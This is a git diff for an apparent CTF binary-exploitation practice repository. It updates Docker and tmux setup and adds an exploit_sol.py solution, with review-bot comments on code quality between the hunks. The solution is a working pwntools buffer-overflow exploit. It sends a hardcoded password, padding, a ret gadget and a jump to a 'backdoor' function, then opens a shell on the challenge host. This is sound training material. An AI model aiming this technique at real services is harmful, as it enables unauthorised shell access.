diff --git a/README.md b/README.md
index a254c5d..8ffca12 100644
--- a/README.md
+++ b/README.md
@@ -16,4 +16,14 @@ There is also a whole playlist using challenges from https://exploit.education.
 # More Docker Videos
 - [How Docker Works - Intro to Namespaces](https://www.youtube.com/watch?v=-YnMr1lj4Z8)
-- [Deepdive Containers - Kernel Sources and nsenter](https://www.youtube.com/watch?v=sHp0Q3rvamk)
\ No newline at end of file
+- [Deepdive Containers - Kernel Sources and nsenter](https://www.youtube.com/watch?v=sHp0Q3rvamk)
+
+# Improvement
+
+Build the ctf container(s), and start with ```docker run --rm -it -v `pwd`:/home/pwntools pwn tmux``` (Credits for the great and simple Dockerfile, tmux config and geff for pwn: https://github.com/Z6543/hackersuli_pwntools)
+If you run the containers on remote vps, you can use code-server to edit the code in you browser: ```docker run -it --rm --name code-server -d -p 8081:8080 \
+ -v "`pwd`/.vs-config:/root/.config" \
+ -v "`pwd`:/home/coder/project" \
+ -u "$(id -u):$(id -g)" \
+ -e "DOCKER_USER=$USER" \
+ codercom/code-server:latest```
diff --git a/challenge/.gdbinit b/challenge/.gdbinit
new file mode 100644
index 0000000..ed36aa6
--- /dev/null
+++ b/challenge/.gdbinit
@@ -0,0 +1 @@
+source /home/pwntools/.gdbinit-gef.py
diff --git a/challenge/.tmux.conf b/challenge/.tmux.conf
new file mode 100644
index 0000000..9c28eb4
--- /dev/null
+++ b/challenge/.tmux.conf
@@ -0,0 +1,3 @@
+set -g mouse on
+set -g default-shell /bin/bash
+PS1="\u@\h:\w \$ "
diff --git a/challenge/Dockerfile b/challenge/Dockerfile
index 2fe0953..480d242 100644
--- a/challenge/Dockerfile
+++ b/challenge/Dockerfile
@@ -1,7 +1,7 @@
 # sudo docker build -t system_health_check .
 # sudo docker run -d -p 1024:1024 --rm -it system_health_check
-FROM ubuntu:19.10
+FROM ubuntu:20.04
 RUN apt-get update
diff --git a/challenge/exploit_sol.py b/challenge/exploit_sol.py
new file mode 100644
index 0000000..7905851
--- /dev/null
+++ b/challenge/exploit_sol.py
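Review bot: `PS1="\u@\h:\w \$ "` on the last line of the new challenge/.tmux.conf is shell syntax, not a tmux command; tmux parses its config file as tmux commands, so this line should produce an unknown-command error when the server loads it, while the two `set -g` lines above it are fine. The config already selects `/bin/bash` as `default-shell`, so the prompt belongs in the user's `~/.bashrc` (e.g. `export PS1="\u@\h:\w \$ "`) and this line can be dropped from .tmux.conf.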
@@ -0,0 +1,76 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# This exploit template was generated via:
+# $ pwn template --host 192.168.88.33 --port 1024
+from pwn import *
+
+os.environ['XDG_CACHE_HOME'] = '/tmp' # some docker glitch fix
+
+# Set up pwntools for the correct architecture
+context.update(arch='i386')
+exe = context.binary = ELF('system_health_check')
+context.terminal = ['tmux','splitw','-h']
+
+# Many built-in settings can be controlled on the command-line and show up
+# in "args". For example, to dump all data sent/received, and disable ASLR
+# for all created processes...
+# ./exploit.py DEBUG NOASLR
+# ./exploit.py GDB HOST=example.com PORT=4141
+host = args.HOST or '192.168.88.33'
+port = int(args.PORT or 1024)
+
+def start_local(argv=[], *a, **kw):
+ '''Execute the target binary locally'''
+ if args.GDB:
+ return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
+ else:
+ return process([exe.path] + argv, *a, **kw)
+
+def start_remote(argv=[], *a, **kw):
+ '''Connect to the process on the remote host'''
+ io = connect(host, port)
+ if args.GDB:
+ gdb.attach(io, gdbscript=gdbscript)
+ return io
+
+def start(argv=[], *a, **kw):
+ '''Start the exploit against the target.'''
+ if args.LOCAL:
+ return start_local(argv, *a, **kw)
+ else:
+ return start_remote(argv, *a, **kw)
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript = '''
+continue
+'''.format(**locals())
+
+#===========================================================
+# EXPLOIT GOES HERE
+#===========================================================
+
+padding = b"A"*cyclic_find("acla")
+payload = padding
+
+
+io = start()
+
+# MOVAPS issue
+rop = ROP(exe)
+ret_gadget = rop.ret
+print(ret_gadget.address)
+payload += p64(ret_gadget.address)
+
+payload += p64(exe.symbols["backdoor"])
+
+
+io.clean()
+# payload = cyclic(0xff+0xf) # find padding
+io.sendline(b"sUp3r_S3cr3T_P4s5w0rD\x00"+payload)
+io.recv(timeout = 2)
+io.sendline("cat flag\n")
+io.interactive()
+
+
diff --git a/ctf/Dockerfile b/ctf/Dockerfile
index f9f7809..b2ba04d 100644
--- a/ctf/Dockerfile
+++ b/ctf/Dockerfile
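Review bot: `io.sendline("cat flag\n")` near the end of the hunk passes a str where every other send in this file uses bytes, and the embedded `\n` is doubled by sendline's own line terminator, so the target most likely receives an extra empty line; `io.sendline(b"cat flag")` keeps the encoding explicit and sends the command once. Separately, `context.update(arch='i386')` is overwritten on the very next line when `context.binary = ELF('system_health_check')` takes the architecture from the binary, so that line is dead and also contradicts the `p64` packing used below it — drop it, or replace it with a comment such as `# arch/bits are taken from the ELF via context.binary` so the next reader is not misled.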
@@ -1,21 +1,4 @@
-# docker build -t ctf:ubuntu19.10 .
-# If using Windows
- # docker run --rm -v %cd%:/pwd --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -d --name ctf -i ctf:ubuntu19.10
-# If using Linux
- # docker run --rm -v $PWD:/pwd --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -d --name ctf -i ctf:ubuntu19.10
-# docker exec -it ctf /bin/bash
+FROM pwntools/pwntools:latest
-FROM ubuntu:19.10
-ENV LC_CTYPE C.UTF-8
-ENV DEBIAN_FRONTEND=noninteractive
-RUN dpkg --add-architecture i386 && \
-apt-get update && \
-apt-get install -y build-essential jq strace ltrace curl wget rubygems gcc dnsutils netcat gcc-multilib net-tools vim gdb gdb-multiarch python python3 python3-pip python3-dev libssl-dev libffi-dev wget git make procps libpcre3-dev libdb-dev libxt-dev libxaw7-dev python-pip libc6:i386 libncurses5:i386 libstdc++6:i386 && \
-pip install capstone requests pwntools r2pipe && \
-pip3 install pwntools keystone-engine unicorn capstone ropper && \
-mkdir tools && cd tools && \
-git clone https://github.com/JonathanSalwan/ROPgadget && \
-git clone https://github.com/radare/radare2 && cd radare2 && sys/install.sh && \
-cd .. && git clone https://github.com/pwndbg/pwndbg && cd pwndbg && git checkout stable && ./setup.sh && \
-cd .. && git clone https://github.com/niklasb/libc-database && cd libc-database && ./get && \
-gem install one_gadget
+RUN sudo apt update
+RUN sudo apt install -y gdb net-tools gdbserver tmux netcat
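Review bot: `FROM pwntools/pwntools:latest` and the two `RUN sudo apt …` lines that make up the new ctf/Dockerfile are unpinned and put `apt update` in its own layer, so a later rebuild can reuse a stale package index from cache and two builds of the same file are not reproducible (hadolint DL3007, DL3009, DL3027). Pin the base image to a specific tag or digest, use `apt-get` instead of the interactive-oriented `apt` front-end, and do the update, install and list cleanup in one `RUN` with `--no-install-recommends` and one package per line so later diffs stay readable. `sudo` implies the base image runs as a non-root user, which is worth keeping; note however that the removed comment block was the only place documenting the `--cap-add=SYS_PTRACE --security-opt seccomp=unconfined` run flags, and the README hunk in this commit shows a plain `docker run` — if gdb/gdbserver attach still needs those flags in this setup, that runbook should be restored somewhere.
```dockerfile
# <pinned-tag> is a placeholder: replace with a specific release tag or @sha256 digest
FROM pwntools/pwntools:<pinned-tag>

RUN sudo apt-get update \
 && sudo apt-get install -y --no-install-recommends \
      gdb \
      gdbserver \
      net-tools \
      netcat \
      tmux \
 && sudo rm -rf /var/lib/apt/lists/*
```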